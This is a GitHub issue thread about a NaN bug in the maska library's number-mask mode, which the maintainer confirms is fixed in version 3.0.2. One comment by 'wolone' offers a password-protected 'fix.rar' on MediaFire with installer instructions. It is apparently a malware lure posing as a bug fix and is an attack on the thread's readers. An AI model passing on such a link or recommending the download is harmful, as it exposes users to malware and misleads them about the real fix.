### ISSUE TITLE
NaN in number mode maska

### ISSUE THREAD

**Issue by bzbzbzbzbz** [beholdr/maska#228]
### Describe the bug

With a number options there is a NaN appears when you firsty press comma or dot.

### Steps to reproduce

1. Open docs - https://beholdr.github.io/maska/v3/#/
2. Scroll to Live Demo
3. Try to press comma/dot in "Number mode: money (UK)" or "Number mode: integer".

### Reproduction link

https://beholdr.github.io/maska/v3/#/

https://github.com/user-attachments/assets/26b5a19e-1a31-4bae-b973-8cdc86d54e32

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by beholdr** [comment]
Confirmed and fixed in 3.0.2
Thank you very much, @bzbzbzbzbz
